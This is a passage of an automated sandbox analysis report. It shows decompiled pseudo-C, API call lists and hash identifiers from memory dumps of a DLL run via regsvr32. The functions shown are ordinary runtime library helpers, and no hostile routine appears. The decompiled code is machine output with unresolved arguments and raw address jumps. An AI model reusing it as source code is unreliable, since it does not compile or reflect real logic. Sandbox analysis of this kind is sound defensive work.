                                                                                                                                                                                                                    				_t90 =  *0x80021010; // 0x4c25b7eca93e
                                                                                                                                                                                                                    				asm("dec eax");
                                                                                                                                                                                                                    				 *(0x180000000 + 0x226f0 + _t102 * 8) = _t72 ^ _t90;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                    0x18000a3dc
                                                                                                                                                                                                                    0x18000a3e1
                                                                                                                                                                                                                    0x18000a3e6
                                                                                                                                                                                                                    0x18000a3f8
                                                                                                                                                                                                                    0x18000a402
                                                                                                                                                                                                                    0x18000a418
                                                                                                                                                                                                                    0x18000a41f
                                                                                                                                                                                                                    0x18000a428
                                                                                                                                                                                                                    0x18000a42e
                                                                                                                                                                                                                    0x18000a437
                                                                                                                                                                                                                    0x18000a439
                                                                                                                                                                                                                    0x18000a43c
                                                                                                                                                                                                                    0x18000a444
                                                                                                                                                                                                                    0x18000a44d
                                                                                                                                                                                                                    0x18000a459
                                                                                                                                                                                                                    0x18000a45e
                                                                                                                                                                                                                    0x18000a464
                                                                                                                                                                                                                    0x18000a476
                                                                                                                                                                                                                    0x18000a47c
                                                                                                                                                                                                                    0x18000a488
                                                                                                                                                                                                                    0x18000a497
                                                                                                                                                                                                                    0x18000a499
                                                                                                                                                                                                                    0x18000a499
                                                                                                                                                                                                                    0x18000a49f
                                                                                                                                                                                                                    0x18000a4b0
                                                                                                                                                                                                                    0x18000a4b2
                                                                                                                                                                                                                    0x18000a4c6
                                                                                                                                                                                                                    0x18000a4c8
                                                                                                                                                                                                                    0x18000a4d0
                                                                                                                                                                                                                    0x18000a4dc
                                                                                                                                                                                                                    0x18000a4e8
                                                                                                                                                                                                                    0x18000a4f7
                                                                                                                                                                                                                    0x18000a4fd
                                                                                                                                                                                                                    0x18000a511
                                                                                                                                                                                                                    0x18000a517
                                                                                                                                                                                                                    0x18000a53d

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 3013587201-537541572
                                                                                                                                                                                                                    • Opcode ID: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                                    • Instruction ID: 4cb29e05f73c92bcfdeebd25cdbb701ff5eb44b215489781f60aaecc25d2491e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4973cf4a17c5a6c0ea837db478b6f4f53bca8011a61d94df8f11c1c7fa6ad517
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED41D032715A0856FBA7CB16AC047D53391B78EBE0F09C225BD1D47798EE38C64D8300
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                    			E000000011800045BC(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                    				struct HINSTANCE__* _t81;
                                                                                                                                                                                                                    				long long _t85;
                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                    				struct HINSTANCE__* _t94;
                                                                                                                                                                                                                    				long _t97;
                                                                                                                                                                                                                    				void* _t100;
                                                                                                                                                                                                                    				signed long long _t101;
                                                                                                                                                                                                                    				WCHAR* _t104;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				 *((long long*)(_t89 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t89 + 0x10)) = _t85;
                                                                                                                                                                                                                    				 *((long long*)(_t89 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				_t101 = _t100 | 0xffffffff;
                                                                                                                                                                                                                    				_t61 =  *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8));
                                                                                                                                                                                                                    				if (_t61 == _t101) goto 0x800046eb;
                                                                                                                                                                                                                    				if (_t61 != 0) goto 0x800046ed;
                                                                                                                                                                                                                    				if (__r8 == __r9) goto 0x800046e3;
                                                                                                                                                                                                                    				_t67 =  *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8));
                                                                                                                                                                                                                    				if (_t67 == 0) goto 0x8000462e;
                                                                                                                                                                                                                    				if (_t67 != _t101) goto 0x800046c5;
                                                                                                                                                                                                                    				goto 0x80004699;
                                                                                                                                                                                                                    				r8d = 0x800;
                                                                                                                                                                                                                    				LoadLibraryExW(_t104, _t100, _t97);
                                                                                                                                                                                                                    				_t68 = _t61;
                                                                                                                                                                                                                    				if (_t61 != 0) goto 0x800046a5;
                                                                                                                                                                                                                    				if (GetLastError() != 0x57) goto 0x80004687;
                                                                                                                                                                                                                    				_t14 = _t68 + 7; // 0x7
                                                                                                                                                                                                                    				r8d = _t14;
                                                                                                                                                                                                                    				if (E00000001180007070(__r8) == 0) goto 0x80004687;
                                                                                                                                                                                                                    				r8d = 0;
                                                                                                                                                                                                                    				LoadLibraryExW(??, ??, ??);
                                                                                                                                                                                                                    				if (_t61 != 0) goto 0x800046a5;
                                                                                                                                                                                                                    				 *((intOrPtr*)(0x180000000 + 0x221f0 + __rsi * 8)) = _t101;
                                                                                                                                                                                                                    				goto 0x8000460c;
                                                                                                                                                                                                                    				_t21 = 0x180000000 + 0x221f0 + __rsi * 8;
                                                                                                                                                                                                                    				_t65 =  *_t21;
                                                                                                                                                                                                                    				 *_t21 = _t61;
                                                                                                                                                                                                                    				if (_t65 == 0) goto 0x800046c5;
                                                                                                                                                                                                                    				FreeLibrary(_t94);
                                                                                                                                                                                                                    				GetProcAddress(_t81);
                                                                                                                                                                                                                    				if (_t65 == 0) goto 0x800046e3;
                                                                                                                                                                                                                    				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t65;
                                                                                                                                                                                                                    				goto 0x800046ed;
                                                                                                                                                                                                                    				 *((intOrPtr*)(0x180000000 + 0x22208 + _t81 * 8)) = _t101;
                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                    0x1800045bc
                                                                                                                                                                                                                    0x1800045c1
                                                                                                                                                                                                                    0x1800045c6
                                                                                                                                                                                                                    0x1800045e1
                                                                                                                                                                                                                    0x1800045ee
                                                                                                                                                                                                                    0x1800045fa
                                                                                                                                                                                                                    0x180004603
                                                                                                                                                                                                                    0x18000460c
                                                                                                                                                                                                                    0x180004615
                                                                                                                                                                                                                    0x180004621
                                                                                                                                                                                                                    0x180004626
                                                                                                                                                                                                                    0x18000462c
                                                                                                                                                                                                                    0x18000463b
                                                                                                                                                                                                                    0x180004641
                                                                                                                                                                                                                    0x180004647
                                                                                                                                                                                                                    0x18000464d
                                                                                                                                                                                                                    0x180004658
                                                                                                                                                                                                                    0x18000465a
                                                                                                                                                                                                                    0x18000465a
                                                                                                                                                                                                                    0x18000466f
                                                                                                                                                                                                                    0x180004671
                                                                                                                                                                                                                    0x180004679
                                                                                                                                                                                                                    0x180004685
                                                                                                                                                                                                                    0x180004691
                                                                                                                                                                                                                    0x1800046a0
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046af
                                                                                                                                                                                                                    0x1800046ba
                                                                                                                                                                                                                    0x1800046bf
                                                                                                                                                                                                                    0x1800046cb
                                                                                                                                                                                                                    0x1800046d4
                                                                                                                                                                                                                    0x1800046d9
                                                                                                                                                                                                                    0x1800046e1
                                                                                                                                                                                                                    0x1800046e3
                                                                                                                                                                                                                    0x180004709

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004641
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 000000018000464F
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 0000000180004679
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00000001800047C3,?,?,?,0000000180002D8E,?,?,?,0000000180002A39), ref: 00000001800046CB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                    • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                                    • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                    • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                                    • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                    • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                                    • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                                                                                                                                    • FlsSetValue.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?,?,00004C25B7ECA93E,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                    • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                                    • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1967609040-0
                                                                                                                                                                                                                    • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                                    • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 63%
                                                                                                                                                                                                                    			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				long long _v40;
                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                    				signed int* _v56;
                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                                    				intOrPtr _t111;
                                                                                                                                                                                                                    				signed int* _t115;
                                                                                                                                                                                                                    				intOrPtr* _t136;
                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                    				void* _t142;
                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t109 = _t144;
                                                                                                                                                                                                                    				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                                                                                                                                    				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                                                                                                                                                    				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                                                                                                                                    				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                                                                                                                                    				_t136 = __rcx;
                                                                                                                                                                                                                    				_t139 = __r9;
                                                                                                                                                                                                                    				_t159 = __r8;
                                                                                                                                                                                                                    				_t142 = __rdx;
                                                                                                                                                                                                                    				E00000001180004584(_t55, __r8);
                                                                                                                                                                                                                    				E00000001180002D40(_t109);
                                                                                                                                                                                                                    				_t115 = _a40;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                                                                                                                                                    				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                                                                                                                                                    				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                                                                                                                                                    				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                                                                                                                                                    				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                                                                                                                                                    				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                                                                                                                                                    				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                                                                                                                                                    				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                                                                                                                                                    				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                                                                                                                                                    				if (_a48 != 0) goto 0x80003d6d;
                                                                                                                                                                                                                    				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                                                                                                                                                    				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                                                                                                                                                    				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                                                                                                                                    				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                                                                                                                                    				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                                                                                                                                    				r9d = _t60;
                                                                                                                                                                                                                    				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                                                                                                                                                    				goto 0x80003d6d;
                                                                                                                                                                                                                    				if ( *_t136 != 0x80000029) goto 0x80003c63;
                                                                                                                                                                                                                    				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                                                                                                                                                    				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                                                                                                                                    				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                                                                                                                                    				goto 0x80003c31;
                                                                                                                                                                                                                    				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                                                                                                                                                    				goto 0x80003d6d;
                                                                                                                                                                                                                    				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                                                                                                                                                    				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                                                                                                                                                    				_t101 = _t115[8];
                                                                                                                                                                                                                    				if (_t101 == 0) goto 0x80003c9e;
                                                                                                                                                                                                                    				E00000001180002408(_t109);
                                                                                                                                                                                                                    				if (_t101 != 0) goto 0x80003cbe;
                                                                                                                                                                                                                    				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                                                                                                                                                    				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                                                                                                                                                    				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                                                                                                                                                    				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                                                                                                                                                    				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                                                                                                                                                    				E0000000118000241C(_t111);
                                                                                                                                                                                                                    				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                                                                                                                                                    				_v32 = _a64 & 0x000000ff;
                                                                                                                                                                                                                    				_v40 = _a56;
                                                                                                                                                                                                                    				_v48 = _a48;
                                                                                                                                                                                                                    				_v56 = _t115;
                                                                                                                                                                                                                    				 *0x80016370(_t158);
                                                                                                                                                                                                                    				goto 0x80003d72;
                                                                                                                                                                                                                    				_v32 = _a56;
                                                                                                                                                                                                                    				_v40 = _a48;
                                                                                                                                                                                                                    				_v48 = _a64;
                                                                                                                                                                                                                    				_v56 = _t115;
                                                                                                                                                                                                                    				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                    0x180003b5c
                                                                                                                                                                                                                    0x180003b5f
                                                                                                                                                                                                                    0x180003b63
                                                                                                                                                                                                                    0x180003b67
                                                                                                                                                                                                                    0x180003b6b
                                                                                                                                                                                                                    0x180003b75
                                                                                                                                                                                                                    0x180003b78
                                                                                                                                                                                                                    0x180003b7e
                                                                                                                                                                                                                    0x180003b81
                                                                                                                                                                                                                    0x180003b84
                                                                                                                                                                                                                    0x180003b89
                                                                                                                                                                                                                    0x180003b8e
                                                                                                                                                                                                                    0x180003ba4
                                                                                                                                                                                                                    0x180003bac
                                                                                                                                                                                                                    0x180003bb0
                                                                                                                                                                                                                    0x180003bb6
                                                                                                                                                                                                                    0x180003bc0
                                                                                                                                                                                                                    0x180003bc4
                                                                                                                                                                                                                    0x180003bd2
                                                                                                                                                                                                                    0x180003bd8
                                                                                                                                                                                                                    0x180003be2
                                                                                                                                                                                                                    0x180003bec
                                                                                                                                                                                                                    0x180003bfa
                                                                                                                                                                                                                    0x180003c04
                                                                                                                                                                                                                    0x180003c08
                                                                                                                                                                                                                    0x180003c14
                                                                                                                                                                                                                    0x180003c1c
                                                                                                                                                                                                                    0x180003c25
                                                                                                                                                                                                                    0x180003c2b
                                                                                                                                                                                                                    0x180003c37
                                                                                                                                                                                                                    0x180003c3c
                                                                                                                                                                                                                    0x180003c43
                                                                                                                                                                                                                    0x180003c45
                                                                                                                                                                                                                    0x180003c4d
                                                                                                                                                                                                                    0x180003c57
                                                                                                                                                                                                                    0x180003c61
                                                                                                                                                                                                                    0x180003c6c
                                                                                                                                                                                                                    0x180003c71
                                                                                                                                                                                                                    0x180003c7a
                                                                                                                                                                                                                    0x180003c88
                                                                                                                                                                                                                    0x180003c8a
                                                                                                                                                                                                                    0x180003c8e
                                                                                                                                                                                                                    0x180003c90
                                                                                                                                                                                                                    0x180003c9c
                                                                                                                                                                                                                    0x180003caa
                                                                                                                                                                                                                    0x180003cb8
                                                                                                                                                                                                                    0x180003cc4
                                                                                                                                                                                                                    0x180003cca
                                                                                                                                                                                                                    0x180003cd3
                                                                                                                                                                                                                    0x180003cd5
                                                                                                                                                                                                                    0x180003cdd
                                                                                                                                                                                                                    0x180003cdf
                                                                                                                                                                                                                    0x180003cf2
                                                                                                                                                                                                                    0x180003d09
                                                                                                                                                                                                                    0x180003d18
                                                                                                                                                                                                                    0x180003d20
                                                                                                                                                                                                                    0x180003d27
                                                                                                                                                                                                                    0x180003d2c
                                                                                                                                                                                                                    0x180003d32
                                                                                                                                                                                                                    0x180003d3f
                                                                                                                                                                                                                    0x180003d51
                                                                                                                                                                                                                    0x180003d5f
                                                                                                                                                                                                                    0x180003d63
                                                                                                                                                                                                                    0x180003d68
                                                                                                                                                                                                                    0x180003d8c

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000003.00000002.390586641.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390580183.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390631909.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390642378.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000003.00000002.390650965.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
